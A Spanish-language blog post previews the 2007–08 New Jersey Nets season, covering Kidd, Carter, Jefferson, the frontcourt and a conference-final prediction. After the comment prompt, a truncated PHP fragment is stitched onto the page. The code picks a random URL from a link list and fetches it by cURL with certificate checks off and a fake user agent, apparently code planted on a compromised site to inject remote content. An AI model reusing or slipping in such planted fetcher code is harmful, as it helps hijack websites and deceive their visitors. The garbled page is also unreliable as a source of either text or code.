New Jersey Nets: ¿y por qué no?

30 de October de 2007 por Queco

kidd jeff carterTenemos un buen alero, un magnífico escolta y uno de los (dos) mejores bases de la liga. ¿Para que queremos más? Algo así debieron pensar los dirigentes de los Nets cuando lograron juntar en el equipo a Richard Jefferson, Vince Carter y Jason Kidd.

 

Y no iban mal encaminados. Es un trío de exteriores fantástico, pero todo equipo necesita algo en la pintura, alguien que asuste, que rebotee, que ponga su granito de arena en la anotación del equipo. Entre la falta de una referencia interior y las lesiones, que siempre han sido un lastre, el equipo nunca terminó de cuajar una gran temporada. Precisamente el año pasado una gravísima lesión de Nenad Krstic dio al traste con las aspiraciones del equipo. Y es que el serbio era el hombre llamado a cubrir ese hueco en la pintura y lo estaba haciendo, pues en el momento de su lesión, a finales de diciembre, promediaba 16.4 puntos y 6.8 rebotes. Así que, con la recuperación de Krstic y el reciente fichaje de Jamaal Magloire, parece que por fin los Nets tendrán una buena pareja interior. Especialmente si tenemos en cuenta que Magloire termina contrato, lo que significa que ha de esforzarse este año para volver a firmar por una gran cifra.

Por supuesto, el líder del equipo, el hombre sobre el que gira todo y el que hace que los que juegan con él parezcan dioses del baloncesto (véase Kenyon Martin) es Jason Kidd. Mientras él esté ahí, los Nets siempre serán aspirantes al trono del Este. El año pasado hubo fuertes rumores de trade, concretamente a los Lakers, pero las negociaciones no llegaron a buen puerto, para regocijo de los fans de los Nets y pesar de los angelinos. Vince Carter, que con el paso del tiempo ha unido a su innata capacidad de penetración un buen tiro exterior -aunque abusa de él en ocasiones- será el escolta titular. Richard Jefferson completa el trío exterior. En el banco esperan Marcus Williams, Antoine Wright y Bostjan Nachbar como suplentes principales. Williams comienza la temporada lesionado, pero hay muchas esperanzas puestas en él para, en un futuro, sustituir a Kidd. Wright puede jugar tanto de escolta como de alero bajo, aunque no ha respondido totalmente a lo que se esperaba de él y parece que los Nets no ejercerán su opción de extensión de contrato. Nachbar alternará los puestos de alero bajo y alto, según las circunstancias del partido, y debe dar un definitivo paso adelante como sexto hombre del equipo.

En la pintura estarán los ya nombrados Krstic y Magloire, Josh Boone, que el año pasado cuajó una buena temporada como rookie, Jason Collins, Malik Allen y el rookie Sean Williams, del que se dice que tiene tanto potencial baloncestístico como problemas con las sustancias prohibidas. La pareja titular será probablemente Krstic-Collins, con Magloire y Boone en la recámara.

En resumen, si el equipo es capaz de mantenerse sin lesiones, cosa difícil visto su historial, llegará lejos. Incluso, por qué no, hasta la misma final de la NBA.

Quinteto inicial: Kidd, Carter, Jefferson, Collins y Krstic
Sexto hombre: Nachbar
Predicción: Final de Conferencia.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>